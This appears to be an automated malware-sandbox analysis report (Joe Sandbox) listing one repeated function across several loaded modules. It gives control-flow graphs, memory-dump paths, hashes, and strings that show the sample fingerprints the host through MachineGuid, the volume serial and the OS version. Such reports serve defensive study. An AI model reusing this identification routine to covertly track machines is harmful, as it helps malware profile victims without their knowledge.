                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                    • Instruction ID: 57d204d98a844dc10ff390f7b1ba0b97585744d8058b5b50d930e206ccf40b2a
                    • Opcode Fuzzy Hash: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                    • Instruction Fuzzy Hash: 09D15965E0C7D781FB218F1DE8403B862A0AF417D4F964032DB5E472A6DE2DF884B792
                    Function 00007FF8BFAB2610 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 603 7ff8bfab2610-7ff8bfab262a call 7ff8bfab7474 606 7ff8bfab2b42 603->606 607 7ff8bfab2630-7ff8bfab2645 call 7ff8bfab73f3 603->607 609 7ff8bfab2b56-7ff8bfab2b5b 606->609 612 7ff8bfab2647-7ff8bfab2675 607->612 613 7ff8bfab269b 607->613 611 7ff8bfab26ad-7ff8bfab26c4 call 7ff8bfaba202 609->611 617 7ff8bfab26c9-7ff8bfab26d6 611->617 621 7ff8bfab2677-7ff8bfab267c 612->621 622 7ff8bfab267e-7ff8bfab2699 call 7ff8bfaba202 612->622 614 7ff8bfab26a0-7ff8bfab26ab FreeLibrary 613->614 614->611 616 7ff8bfab26d7-7ff8bfab2710 GetNativeSystemInfo GetWindowsDirectoryA 614->616 619 7ff8bfab2716-7ff8bfab2737 GetLastError call 7ff8bfaba202 616->619 620 7ff8bfab27ee-7ff8bfab2811 call 7ff8bfaba202 616->620 629 7ff8bfab2757-7ff8bfab275d 619->629 630 7ff8bfab2739 619->630 620->611 631 7ff8bfab2817-7ff8bfab284d call 7ff8bfab7e42 620->631 621->614 622->614 629->609 635 7ff8bfab2763-7ff8bfab2769 629->635 632 7ff8bfab273b-7ff8bfab2748 630->632 633 7ff8bfab274d-7ff8bfab2752 630->633 639 7ff8bfab2853-7ff8bfab2855 631->639 640 7ff8bfab28fe-7ff8bfab291a call 7ff8bfaba202 631->640 632->633 633->611 636 7ff8bfab27a2-7ff8bfab27a8 635->636 637 7ff8bfab276b-7ff8bfab276e 635->637 643 7ff8bfab2b7e-7ff8bfab2b83 636->643 644 7ff8bfab27ae-7ff8bfab27b4 636->644 641 7ff8bfab2770-7ff8bfab2773 637->641 642 7ff8bfab278c-7ff8bfab2792 637->642 639->611 645 7ff8bfab285b-7ff8bfab28b8 GetVolumeInformationA 639->645 659 7ff8bfab291f 640->659 646 7ff8bfab2b60-7ff8bfab2b65 641->646 647 7ff8bfab2779-7ff8bfab277c 641->647 648 7ff8bfab2b74-7ff8bfab2b79 642->648 649 7ff8bfab2798-7ff8bfab279d 642->649 643->611 650 7ff8bfab27ba-7ff8bfab27c0 644->650 651 7ff8bfab2b88-7ff8bfab2b8d 644->651 653 7ff8bfab29bb-7ff8bfab29ed call 7ff8bfaba202 645->653 654 7ff8bfab28be-7ff8bfab28e4 GetLastError call 7ff8bfaba202 645->654 646->611 655 7ff8bfab2782-7ff8bfab2787 647->655 656 7ff8bfab2b6a-7ff8bfab2b6f 647->656 648->611 649->611 657 7ff8bfab2b92-7ff8bfab2b97 650->657 658 7ff8bfab27c6-7ff8bfab27cb 650->658 651->611 666 7ff8bfab2a01-7ff8bfab2a08 653->666 667 7ff8bfab29ef-7ff8bfab29fb strlen 653->667 664 7ff8bfab28e6 654->664 665 7ff8bfab2924-7ff8bfab292a 654->665 655->611 656->611 657->611 658->611 659->639 668 7ff8bfab2a73-7ff8bfab2a78 664->668 669 7ff8bfab28ec-7ff8bfab28f9 664->669 670 7ff8bfab2930 665->670 671 7ff8bfab2a87-7ff8bfab2a8c 665->671 673 7ff8bfab2a0c-7ff8bfab2a69 call 7ff8bfaba202 666->673 667->666 672 7ff8bfab2ac3-7ff8bfab2ac7 667->672 668->611 669->640 675 7ff8bfab2932-7ff8bfab2935 670->675 676 7ff8bfab2969-7ff8bfab296f 670->676 671->611 672->666 674 7ff8bfab2acd-7ff8bfab2ad1 672->674 683 7ff8bfab2a6e 673->683 674->666 680 7ff8bfab2ad7-7ff8bfab2b0a _errno call 7ff8bfabecb8 _errno 674->680 681 7ff8bfab2953-7ff8bfab2959 675->681 682 7ff8bfab2937-7ff8bfab293a 675->682 678 7ff8bfab2975-7ff8bfab297b 676->678 679 7ff8bfab2aaf-7ff8bfab2ab4 676->679 686 7ff8bfab2981-7ff8bfab2987 678->686 687 7ff8bfab2ab9-7ff8bfab2abe 678->687 679->611 696 7ff8bfab2b1a-7ff8bfab2b3d _errno call 7ff8bfaba202 680->696 697 7ff8bfab2b0c-7ff8bfab2b0f 680->697 684 7ff8bfab2aa5-7ff8bfab2aaa 681->684 685 7ff8bfab295f-7ff8bfab2964 681->685 689 7ff8bfab2940-7ff8bfab2943 682->689 690 7ff8bfab2a91-7ff8bfab2a96 682->690 683->617 684->611 685->611 693 7ff8bfab2993-7ff8bfab2998 686->693 694 7ff8bfab2989-7ff8bfab298e 686->694 687->611 691 7ff8bfab2a9b-7ff8bfab2aa0 689->691 692 7ff8bfab2949-7ff8bfab294e 689->692 690->611 691->611 692->611 693->611 694->611 696->666 697->673 698 7ff8bfab2b15 697->698 698->666
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                    • Instruction ID: 83a1c38ba7d02ff4256f65cf155754944c0ef5c87e64cdc40de87c248c2625ab
                    • Opcode Fuzzy Hash: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                    • Instruction Fuzzy Hash: 80D17521E0CA5385FB298B9CE8623B963A0EF417DCF156033CB4E57696DE2DEC499341
                    Function 00007FF8BA503420 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 505 7ff8ba503420-7ff8ba50343a call 7ff8ba509ff4 508 7ff8ba503952 505->508 509 7ff8ba503440-7ff8ba503455 call 7ff8ba509f73 505->509 512 7ff8ba503966-7ff8ba50396b 508->512 513 7ff8ba503457-7ff8ba503485 509->513 514 7ff8ba5034ab 509->514 515 7ff8ba5034bd-7ff8ba5034d4 call 7ff8ba501292 512->515 523 7ff8ba503487-7ff8ba50348c 513->523 524 7ff8ba50348e-7ff8ba5034a9 call 7ff8ba501292 513->524 516 7ff8ba5034b0-7ff8ba5034bb FreeLibrary 514->516 520 7ff8ba5034d9-7ff8ba5034e6 515->520 516->515 519 7ff8ba5034e7-7ff8ba503520 GetNativeSystemInfo GetWindowsDirectoryA 516->519 521 7ff8ba503526-7ff8ba503547 GetLastError call 7ff8ba501292 519->521 522 7ff8ba5035fe-7ff8ba503621 call 7ff8ba501292 519->522 531 7ff8ba503567-7ff8ba50356d 521->531 532 7ff8ba503549 521->532 522->515 533 7ff8ba503627-7ff8ba50365d call 7ff8ba508702 522->533 523->516 524->516 531->512 537 7ff8ba503573-7ff8ba503579 531->537 534 7ff8ba50355d-7ff8ba503562 532->534 535 7ff8ba50354b-7ff8ba503558 532->535 543 7ff8ba503663-7ff8ba503665 533->543 544 7ff8ba50370e-7ff8ba50372a call 7ff8ba501292 533->544 534->515 535->534 539 7ff8ba5035b2-7ff8ba5035b8 537->539 540 7ff8ba50357b-7ff8ba50357e 537->540 541 7ff8ba50398e-7ff8ba503993 539->541 542 7ff8ba5035be-7ff8ba5035c4 539->542 545 7ff8ba503580-7ff8ba503583 540->545 546 7ff8ba50359c-7ff8ba5035a2 540->546 541->515 547 7ff8ba5035ca-7ff8ba5035d0 542->547 548 7ff8ba503998-7ff8ba50399d 542->548 543->515 550 7ff8ba50366b-7ff8ba5036c8 GetVolumeInformationA 543->550 557 7ff8ba50372f 544->557 551 7ff8ba503970-7ff8ba503975 545->551 552 7ff8ba503589-7ff8ba50358c 545->552 553 7ff8ba503984-7ff8ba503989 546->553 554 7ff8ba5035a8-7ff8ba5035ad 546->554 555 7ff8ba5035d6-7ff8ba5035db 547->555 556 7ff8ba5039a2-7ff8ba5039a7 547->556 548->515 558 7ff8ba5036ce-7ff8ba5036f4 GetLastError call 7ff8ba501292 550->558 559 7ff8ba5037cb-7ff8ba5037fd call 7ff8ba501292 550->559 551->515 560 7ff8ba503592-7ff8ba503597 552->560 561 7ff8ba50397a-7ff8ba50397f 552->561 553->515 554->515 555->515 556->515 557->543 568 7ff8ba5036f6 558->568 569 7ff8ba503734-7ff8ba50373a 558->569 566 7ff8ba503811-7ff8ba503818 559->566 567 7ff8ba5037ff-7ff8ba50380b strlen 559->567 560->515 561->515 575 7ff8ba50381c-7ff8ba503879 call 7ff8ba501292 566->575 567->566 572 7ff8ba5038d3-7ff8ba5038d7 567->572 570 7ff8ba503883-7ff8ba503888 568->570 571 7ff8ba5036fc-7ff8ba503709 568->571 573 7ff8ba503897-7ff8ba50389c 569->573 574 7ff8ba503740 569->574 570->515 571->544 572->566 576 7ff8ba5038dd-7ff8ba5038e1 572->576 573->515 577 7ff8ba503742-7ff8ba503745 574->577 578 7ff8ba503779-7ff8ba50377f 574->578 583 7ff8ba50387e 575->583 576->566 580 7ff8ba5038e7-7ff8ba50391a _errno call 7ff8ba511118 _errno 576->580 581 7ff8ba503747-7ff8ba50374a 577->581 582 7ff8ba503763-7ff8ba503769 577->582 584 7ff8ba503785-7ff8ba50378b 578->584 585 7ff8ba5038bf-7ff8ba5038c4 578->585 598 7ff8ba50391c-7ff8ba50391f 580->598 599 7ff8ba50392a-7ff8ba50394d _errno call 7ff8ba501292 580->599 587 7ff8ba5038a1-7ff8ba5038a6 581->587 588 7ff8ba503750-7ff8ba503753 581->588 589 7ff8ba5038b5-7ff8ba5038ba 582->589 590 7ff8ba50376f-7ff8ba503774 582->590 583->520 591 7ff8ba503791-7ff8ba503797 584->591 592 7ff8ba5038c9-7ff8ba5038ce 584->592 585->515 587->515 596 7ff8ba5038ab-7ff8ba5038b0 588->596 597 7ff8ba503759-7ff8ba50375e 588->597 589->515 590->515 593 7ff8ba5037a3-7ff8ba5037a8 591->593 594 7ff8ba503799-7ff8ba50379e 591->594 592->515 593->515 594->515 596->515 597->515 598->575 600 7ff8ba503925 598->600 599->566 600->566
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                    • Instruction ID: 34ccbaca7a4e1c7f37488826fceb1f2295cd5b1b851f143999c5ec2b6b174b42
                    • Opcode Fuzzy Hash: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                    • Instruction Fuzzy Hash: 78D15B71E0C652C2F6308B9DAC843BA2260AF437E4F5540F2DF5E472B4DE2DAA848385
                    Function 00007FF8B918E870 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 407 7ff8b918e870-7ff8b918e88a call 7ff8b9181aa4 410 7ff8b918e890-7ff8b918e8a5 call 7ff8b9181a23 407->410 411 7ff8b918eda2 407->411 415 7ff8b918e8a7-7ff8b918e8d5 410->415 416 7ff8b918e8fb 410->416 414 7ff8b918edb6-7ff8b918edbb 411->414 417 7ff8b918e90d-7ff8b918e924 call 7ff8b9181292 414->417 423 7ff8b918e8d7-7ff8b918e8dc 415->423 424 7ff8b918e8de-7ff8b918e8f9 call 7ff8b9181292 415->424 418 7ff8b918e900-7ff8b918e90b FreeLibrary 416->418 422 7ff8b918e929-7ff8b918e936 417->422 418->417 421 7ff8b918e937-7ff8b918e970 GetNativeSystemInfo GetWindowsDirectoryA 418->421 425 7ff8b918e976-7ff8b918e997 GetLastError call 7ff8b9181292 421->425 426 7ff8b918ea4e-7ff8b918ea71 call 7ff8b9181292 421->426 423->418 424->418 433 7ff8b918e9b7-7ff8b918e9bd 425->433 434 7ff8b918e999 425->434 426->417 435 7ff8b918ea77-7ff8b918eaad call 7ff8b9182472 426->435 433->414 439 7ff8b918e9c3-7ff8b918e9c9 433->439 436 7ff8b918e99b-7ff8b918e9a8 434->436 437 7ff8b918e9ad-7ff8b918e9b2 434->437 443 7ff8b918eab3-7ff8b918eab5 435->443 444 7ff8b918eb5e-7ff8b918eb7a call 7ff8b9181292 435->444 436->437 437->417 441 7ff8b918ea02-7ff8b918ea08 439->441 442 7ff8b918e9cb-7ff8b918e9ce 439->442 447 7ff8b918edde-7ff8b918ede3 441->447 448 7ff8b918ea0e-7ff8b918ea14 441->448 445 7ff8b918e9d0-7ff8b918e9d3 442->445 446 7ff8b918e9ec-7ff8b918e9f2 442->446 443->417 450 7ff8b918eabb-7ff8b918eb18 GetVolumeInformationA 443->450 459 7ff8b918eb7f 444->459 451 7ff8b918edc0-7ff8b918edc5 445->451 452 7ff8b918e9d9-7ff8b918e9dc 445->452 453 7ff8b918edd4-7ff8b918edd9 446->453 454 7ff8b918e9f8-7ff8b918e9fd 446->454 447->417 455 7ff8b918ede8-7ff8b918eded 448->455 456 7ff8b918ea1a-7ff8b918ea20 448->456 460 7ff8b918ec1b-7ff8b918ec4d call 7ff8b9181292 450->460 461 7ff8b918eb1e-7ff8b918eb44 GetLastError call 7ff8b9181292 450->461 451->417 462 7ff8b918e9e2-7ff8b918e9e7 452->462 463 7ff8b918edca-7ff8b918edcf 452->463 453->417 454->417 455->417 457 7ff8b918edf2-7ff8b918edf7 456->457 458 7ff8b918ea26-7ff8b918ea2b 456->458 457->417 458->417 459->443 468 7ff8b918ec61-7ff8b918ec68 460->468 469 7ff8b918ec4f-7ff8b918ec5b strlen 460->469 470 7ff8b918eb84-7ff8b918eb8a 461->470 471 7ff8b918eb46 461->471 462->417 463->417 475 7ff8b918ec6c-7ff8b918ecc9 call 7ff8b9181292 468->475 469->468 472 7ff8b918ed23-7ff8b918ed27 469->472 473 7ff8b918eb90 470->473 474 7ff8b918ece7-7ff8b918ecec 470->474 476 7ff8b918ecd3-7ff8b918ecd8 471->476 477 7ff8b918eb4c-7ff8b918eb59 471->477 472->468 481 7ff8b918ed2d-7ff8b918ed31 472->481 478 7ff8b918eb92-7ff8b918eb95 473->478 479 7ff8b918ebc9-7ff8b918ebcf 473->479 474->417 485 7ff8b918ecce 475->485 476->417 477->444 483 7ff8b918ebb3-7ff8b918ebb9 478->483 484 7ff8b918eb97-7ff8b918eb9a 478->484 486 7ff8b918ebd5-7ff8b918ebdb 479->486 487 7ff8b918ed0f-7ff8b918ed14 479->487 481->468 482 7ff8b918ed37-7ff8b918ed6a _errno call 7ff8b91946f0 _errno 481->482 500 7ff8b918ed7a-7ff8b918ed9d _errno call 7ff8b9181292 482->500 501 7ff8b918ed6c-7ff8b918ed6f 482->501 491 7ff8b918ed05-7ff8b918ed0a 483->491 492 7ff8b918ebbf-7ff8b918ebc4 483->492 489 7ff8b918eba0-7ff8b918eba3 484->489 490 7ff8b918ecf1-7ff8b918ecf6 484->490 485->422 493 7ff8b918ebe1-7ff8b918ebe7 486->493 494 7ff8b918ed19-7ff8b918ed1e 486->494 487->417 496 7ff8b918eba9-7ff8b918ebae 489->496 497 7ff8b918ecfb-7ff8b918ed00 489->497 490->417 491->417 492->417 498 7ff8b918ebf3-7ff8b918ebf8 493->498 499 7ff8b918ebe9-7ff8b918ebee 493->499 494->417 496->417 497->417 498->417 499->417 500->468 501->475 502 7ff8b918ed75 501->502 502->468
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                    • Instruction ID: b3bf22cab428c52db068d7083d2ad9d40cce2f7d42920e4353f3dfbedd385ec5
                    • Opcode Fuzzy Hash: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                    • Instruction Fuzzy Hash: F4D18D21E0C6D682FA60EF1CE4843B87A95AF417E4F564132CB9E072A2DE6DAC45B741
                    Function 00007FF7088793F0 Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 937 7ff7088793f0-7ff70887940a call 7ff708871694 940 7ff708879922 937->940 941 7ff708879410-7ff708879425 call 7ff708871613 937->941 944 7ff708879936-7ff70887993b 940->944 945 7ff70887947b 941->945 946 7ff708879427-7ff708879455 941->946 947 7ff70887948d-7ff7088794a4 call 7ff7088799e2 944->947 948 7ff708879480-7ff70887948b FreeLibrary 945->948 953 7ff70887945e-7ff708879479 call 7ff7088799e2 946->953 954 7ff708879457-7ff70887945c 946->954 952 7ff7088794a9-7ff7088794b6 947->952 948->947 951 7ff7088794b7-7ff7088794f0 GetNativeSystemInfo GetWindowsDirectoryA 948->951 955 7ff7088795ce-7ff7088795f1 call 7ff7088799e2 951->955 956 7ff7088794f6-7ff708879517 GetLastError call 7ff7088799e2 951->956 953->948 954->948 955->947 965 7ff7088795f7-7ff70887962d call 7ff708875602 955->965 963 7ff708879519 956->963 964 7ff708879537-7ff70887953d 956->964 966 7ff70887952d-7ff708879532 963->966 967 7ff70887951b-7ff708879528 963->967 964->944 969 7ff708879543-7ff708879549 964->969 973 7ff7088796de-7ff7088796fa call 7ff7088799e2 965->973 974 7ff708879633-7ff708879635 965->974 966->947 967->966 971 7ff70887954b-7ff70887954e 969->971 972 7ff708879582-7ff708879588 969->972 975 7ff70887956c-7ff708879572 971->975 976 7ff708879550-7ff708879553 971->976 977 7ff70887995e-7ff708879963 972->977 978 7ff70887958e-7ff708879594 972->978 989 7ff7088796ff 973->989 974->947 982 7ff70887963b-7ff708879698 GetVolumeInformationA 974->982 985 7ff708879578-7ff70887957d 975->985 986 7ff708879954-7ff708879959 975->986 983 7ff708879559-7ff70887955c 976->983 984 7ff708879940-7ff708879945 976->984 977->947 979 7ff70887959a-7ff7088795a0 978->979 980 7ff708879968-7ff70887996d 978->980 987 7ff7088795a6-7ff7088795ab 979->987 988 7ff708879972-7ff708879977 979->988 980->947 990 7ff70887969e-7ff7088796c4 GetLastError call 7ff7088799e2 982->990 991 7ff70887979b-7ff7088797cd call 7ff7088799e2 982->991 992 7ff70887994a-7ff70887994f 983->992 993 7ff708879562-7ff708879567 983->993 984->947 985->947 986->947 987->947 988->947 989->974 1000 7ff7088796c6 990->1000 1001 7ff708879704-7ff70887970a 990->1001 998 7ff7088797e1-7ff7088797e8 991->998 999 7ff7088797cf-7ff7088797db strlen 991->999 992->947 993->947 1005 7ff7088797ec-7ff708879849 call 7ff7088799e2 998->1005 999->998 1002 7ff7088798a3-7ff7088798a7 999->1002 1006 7ff7088796cc-7ff7088796d9 1000->1006 1007 7ff708879853-7ff708879858 1000->1007 1003 7ff708879867-7ff70887986c 1001->1003 1004 7ff708879710 1001->1004 1002->998 1008 7ff7088798ad-7ff7088798b1 1002->1008 1003->947 1009 7ff708879749-7ff70887974f 1004->1009 1010 7ff708879712-7ff708879715 1004->1010 1015 7ff70887984e 1005->1015 1006->973 1007->947 1008->998 1012 7ff7088798b7-7ff7088798ea _errno call 7ff70887e4f0 _errno 1008->1012 1016 7ff708879755-7ff70887975b 1009->1016 1017 7ff70887988f-7ff708879894 1009->1017 1013 7ff708879717-7ff70887971a 1010->1013 1014 7ff708879733-7ff708879739 1010->1014 1030 7ff7088798ec-7ff7088798ef 1012->1030 1031 7ff7088798fa-7ff70887991d _errno call 7ff7088799e2 1012->1031 1019 7ff708879871-7ff708879876 1013->1019 1020 7ff708879720-7ff708879723 1013->1020 1021 7ff708879885-7ff70887988a 1014->1021 1022 7ff70887973f-7ff708879744 1014->1022 1015->952 1023 7ff708879899-7ff70887989e 1016->1023 1024 7ff708879761-7ff708879767 1016->1024 1017->947 1019->947 1026 7ff70887987b-7ff708879880 1020->1026 1027 7ff708879729-7ff70887972e 1020->1027 1021->947 1022->947 1023->947 1028 7ff708879769-7ff70887976e 1024->1028 1029 7ff708879773-7ff708879778 1024->1029 1026->947 1027->947 1028->947 1029->947 1030->1005 1032 7ff7088798f5 1030->1032 1031->998 1032->998
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                    • API String ID: 3828489143-3798070276
                    • Opcode ID: a1b5e51bd6410f3c83cdfc6e219792161668188f7e39e64117da69d6b01f4c97
                    • Instruction ID: 0dc005fbc2ef7a2b73d71beacf92cdcd9264e75e5675e43bac14173969b0c8b8
                    • Opcode Fuzzy Hash: a1b5e51bd6410f3c83cdfc6e219792161668188f7e39e64117da69d6b01f4c97
                    • Instruction Fuzzy Hash: 3ED12D21D3D65281FA20EB14EC80FB9EA70AF40B54FD54032C94E576E5DF2DECA487A9
                    Function 00007FF8BFB8330E Relevance: 39.4, APIs: 7, Strings: 19, Instructions: 381COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
